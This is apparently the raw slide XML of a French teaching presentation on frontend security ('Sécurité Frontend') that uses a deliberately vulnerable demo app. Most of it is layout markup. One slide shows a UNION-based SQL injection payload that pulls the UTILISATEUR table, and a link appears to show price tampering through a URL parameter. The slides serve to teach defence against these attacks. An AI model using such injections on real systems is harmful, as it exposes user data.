              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Shape 18"/>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tête de sectio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722312" y="2906713"/>
            <a:ext cx="7772400" cy="1500000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="b" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Verdana"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457200" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="888888"/>
              </a:buClr>
              <a:buFont typeface="Verdana"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914400" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="888888"/>
              </a:buClr>
              <a:buFont typeface="Verdana"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371600" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="888888"/>
              </a:buClr>
              <a:buFont typeface="Verdana"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1828800" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="888888"/>
              </a:buClr>
              <a:buFont typeface="Verdana"/>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22" name="Shape 22"/>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algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buFont typeface="Verdan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367374"/>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2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4648200" y="1367374"/>
            <a:ext cx="4038599" cy="45261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323453"/>
            <a:ext cx="4040099" cy="639600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="b" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Verdana"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457200" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Verdana"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914400" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Verdana"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371600" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Verdana"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1828800" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Verdana"/>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1" name="Shape 31"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1963215"/>
            <a:ext cx="4040099"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3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4645025" y="1323453"/>
            <a:ext cx="4041900" cy="639600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="b" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Verdana"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457200" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Verdana"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914400" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Verdana"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371600" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Verdana"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1828800" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Verdana"/>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3" name="Shape 33"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4645025" y="1963215"/>
            <a:ext cx="4041900" cy="3951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algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buFont typeface="Verdan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Vide">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 38"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Shape 39"/>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a:off x="3575050" y="931333"/>
            <a:ext cx="5111699" cy="51948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spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Verdana"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457200" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Verdana"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914400" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Verdana"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371600" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Verdana"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1828800" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Verdana"/>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4" name="Shape 44"/>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 avec légende">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a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1792288" y="1238249"/>
            <a:ext cx="5486399" cy="3489300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="Shape 48"/>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Verdana"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457200" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Verdana"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914400" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Verdana"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371600" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Verdana"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1828800" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Verdana"/>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9" name="Shape 49"/>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rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="fr"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="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5799667"/>
            <a:ext cx="9152810" cy="1047749"/>
            <a:chOff x="0" y="5799667"/>
            <a:chExt cx="9152810" cy="1047749"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Shape 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="5799667"/>
              <a:ext cx="9152810" cy="1047749"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="0" t="0" r="0" b="0"/>
              <a:pathLst>
                <a:path w="9175750" h="1047750" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="0" y="772583"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="9165167" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9175750" y="1047750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10584" y="1047750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="772583"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="CF1633"/>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7" name="Shape 7"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId14">
              <a:alphaModFix/>
            </a:blip>
            <a:srcRect/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6974417" y="5995617"/>
              <a:ext cx="2169600" cy="851699"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Shape 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-10583" y="-21166"/>
            <a:ext cx="9154582" cy="1439333"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="0" t="0" r="0" b="0"/>
            <a:pathLst>
              <a:path w="9154583" h="1439334" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="1439334"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9154583" y="666750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9154583" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10583" y="21167"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7055" y="493889"/>
                  <a:pt x="3528" y="966612"/>
                  <a:pt x="0" y="1439334"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="343538"/>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9" name="Shape 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="126994" y="105309"/>
            <a:ext cx="8339700" cy="677999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Dosis"/>
              <a:buNone/>
              <a:defRPr sz="2600">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
                <a:ea typeface="Dosis"/>
                <a:cs typeface="Dosis"/>
                <a:sym typeface="Dosis"/>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sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6572250"/>
            <a:ext cx="1016099" cy="2751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fr" sz="1300"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr" sz="1300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Shape 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1418167"/>
            <a:ext cx="9144000" cy="4381500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="342900" marR="0" indent="-139700" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="640"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Dosis"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:latin typeface="Dosis"/>
                <a:ea typeface="Dosis"/>
                <a:cs typeface="Dosis"/>
                <a:sym typeface="Dosis"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" marR="0" indent="-107950" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Dosis"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2400">
                <a:latin typeface="Dosis"/>
                <a:ea typeface="Dosis"/>
                <a:cs typeface="Dosis"/>
                <a:sym typeface="Dosis"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" marR="0" indent="-76200" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Dosis"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:latin typeface="Dosis"/>
                <a:ea typeface="Dosis"/>
                <a:cs typeface="Dosis"/>
                <a:sym typeface="Dosis"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" marR="0" indent="-101600" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Dosis"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2400">
                <a:latin typeface="Dosis"/>
                <a:ea typeface="Dosis"/>
                <a:cs typeface="Dosis"/>
                <a:sym typeface="Dosis"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" marR="0" indent="-101600" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Dosis"/>
              <a:buChar char="»"/>
              <a:defRPr sz="2400">
                <a:latin typeface="Dosis"/>
                <a:ea typeface="Dosis"/>
                <a:cs typeface="Dosis"/>
                <a:sym typeface="Dosis"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2514600" marR="0" indent="-101600" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Dosis"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:latin typeface="Dosis"/>
                <a:ea typeface="Dosis"/>
                <a:cs typeface="Dosis"/>
                <a:sym typeface="Dosis"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2971800" marR="0" indent="-101600" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Dosis"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:latin typeface="Dosis"/>
                <a:ea typeface="Dosis"/>
                <a:cs typeface="Dosis"/>
                <a:sym typeface="Dosis"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3429000" marR="0" indent="-101600" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Dosis"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">
                <a:latin typeface="Dosis"/>
                <a:ea typeface="Dosis"/>
                <a:cs typeface="Dosis"/>
                <a:sym typeface="Dosis"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3886200" marR="0" indent="-101600" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Dosis"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400">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hyperlink" Target="http://securite-app-gruyere.herokuapp.com/compte/modifier/produits?prdId=104&amp;prix=10"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hyperlink" Target="http://securite-app-gruyere.herokuapp.com/authentification" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://securite-app-gruyere.herokuapp.com" TargetMode="External"/><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8.jp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ecurite-app-gruyere.herokuapp.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jpg"/><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685800" y="795848"/>
            <a:ext cx="7772400" cy="1546500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sécurité Frontend</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="64" name="Shape 64"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1409700" y="2128125"/>
            <a:ext cx="6324600" cy="3562350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="Shape 65"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8556783" y="6333134"/>
            <a:ext cx="548699" cy="524999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="fr"/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="f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41" name="Shape 14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Comment ça marche ?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="142" name="Shape 142"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="598900" y="3615300"/>
            <a:ext cx="7395900" cy="2201099"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EFEFEF"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="3600" b="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>⇒</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="3000">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="2600">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>SELECT * FROM PRODUIT </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="2600">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>WHERE PRD_CATEGORIE = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="2600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>'bijou</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> UNION </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> SELECT * FROM UTILISATEUR </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>WHERE '1' = '1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="2600">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="143" name="Shape 143"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect r="50206" b="10586"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1537400" y="1306850"/>
            <a:ext cx="7583174" cy="1257699"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="144" name="Shape 144"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="36122" t="46432" r="17773" b="9634"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="804299" y="2717100"/>
            <a:ext cx="8339699" cy="745639"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
